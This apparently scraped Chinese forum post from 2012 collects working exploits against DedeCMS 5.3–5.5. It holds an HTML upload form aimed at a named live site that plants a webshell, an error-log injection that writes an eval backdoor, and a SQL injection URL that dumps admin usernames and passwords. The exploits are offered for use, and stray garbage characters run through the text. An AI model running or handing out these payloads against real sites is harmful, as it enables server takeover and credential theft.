" b. L/ C0 T$ k4 _<head>. n* G8 X6 v- K+ Y, X, O
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>' ~ W) l- _8 o
</head>, O7 Y& G ~4 |- e1 z1 D2 I
<body style="FONT-SIZE: 9pt">& p" Z. b& x3 y+ I
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
) ~8 | N- ]; l<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
5 T2 u$ H4 y( M1 a9 p4 W" \<input type='hidden' name='activepath' value='/data/cache/' />) m0 M! ?8 A" X W N
<input type='hidden' name='cfg_basedir' value='../../' />
0 p0 w' |& }; U0 b' g7 J4 G<input type='hidden' name='cfg_imgtype' value='php' />2 v) [8 H4 Q6 ]6 {" b/ e7 }
<input type='hidden' name='cfg_not_allowall' value='txt' />4 K; \6 V, C6 P- I
<input type='hidden' name='cfg_softtype' value='php' />; ]7 a0 _1 c' f3 o
<input type='hidden' name='cfg_mediatype' value='php' />
0 [6 h' L- n$ v<input type='hidden' name='f' value='form1.enclosure' />
/ i* Y9 l# R2 ^4 F. D<input type='hidden' name='job' value='upload' />9 \$ ]" G3 e! g/ P6 S! X$ X/ q' ]: F
<input type='hidden' name='newname' value='fly.php' />8 |! Q" |8 ~8 l! ?8 S: X2 O
Select U Shell <input type='file' name='uploadfile' size='25' />
( p8 b: X3 H! J* g<input type='submit' name='sb1' value='确定' />
+ O u$ U0 F, _; M</form># }2 y4 z. P5 Y" d7 ?6 ~" `% K
<br />It's just a exp for the bug of Dedecms V55...<br />& o# f8 l7 T9 n) t* B. J- h
Need register_globals = on...<br />
% L4 @2 j" ^' p' c+ O0 t, ]+ ~Fun the game,get a webshell at /data/cache/fly.php...<br />
; R1 F) Y1 d$ x</body>( T! H- }8 x& g8 W
</html>" A( w0 R7 x, q) O& M
8 R' z8 J7 p ]0 g4 H4 U R y% m- }* U
& N& H: @ t$ E' r- O; v+ l5 }" E8 W6 k3 L( x7 _
7 m- \5 c; P/ d8 f, T7 S0 v6 q6 e+ z: b
* b! S* H# T3 W) U+ \
/ m# w7 g+ j# J3 [$ d
" R$ @' A' @, x" E8 k6 {& ?7 ?+ H7 r* k8 Q. l6 J1 }
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞% {3 H' q, ?1 @2 y
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。3 {! |( l* Q, e* I) d; J/ \
1. 访问网址:( J" \, o" w1 Y6 s6 k+ ^
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?># r3 d5 t/ K( M/ Z' j" I* U
可看见错误信息
+ v1 C0 M5 b9 K8 Y$ ^, o
0 l; T% J- I' q, }
2 u0 \9 M5 y: Z+ l3 {: t( u/ K2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。/ c! K* _/ [$ \5 h0 ^8 G9 [" w
int(3) Error: Illegal double '1024e1024' value found during parsing
. U+ a v- k' b/ _8 [! L; iError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
7 |& P5 S* I L8 y- }" V u& H5 j* Q f6 @& |& y
9 f1 ^. u( _7 z$ S/ K' R u0 \3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
! W. p( y/ _) q1 Y% ^+ j
# b: {5 W* n. {. Y
) J4 |' x! A1 C! S" x<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
8 z% f0 t: m7 O# s$ k: V& v3 U& s T8 D7 L4 P9 r o# T
- T7 H0 h5 u' l3 T8 U* n! j4 W按确定后的看到第2步骤的信息表示文件木马上传成功., P- z6 C5 e, d; o$ V2 t: B
6 X8 Q3 \& f* ?+ e4 T% A, {1 Z* C' ^; e
& P s4 Y% E, B8 r& M1 _ L ~& R. t+ p8 p6 J& X
$ ~2 [/ x3 I0 T( W' m" ?: @( m5 ~) w" v0 f9 A( B
3 u- G( y3 J4 G, c: U; C
0 @' D1 J; ?# R/ q1 F, b
7 \+ \/ ^0 L2 R
. C1 Z* p: |) O v; Q$ O
+ A6 x" c( Z9 R
+ Y; x# ^' E) t5 _织梦(DedeCms)plus/infosearch.php 文件注入漏洞
& d L Y& L0 d% v* ]1 M, N2 Lhttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对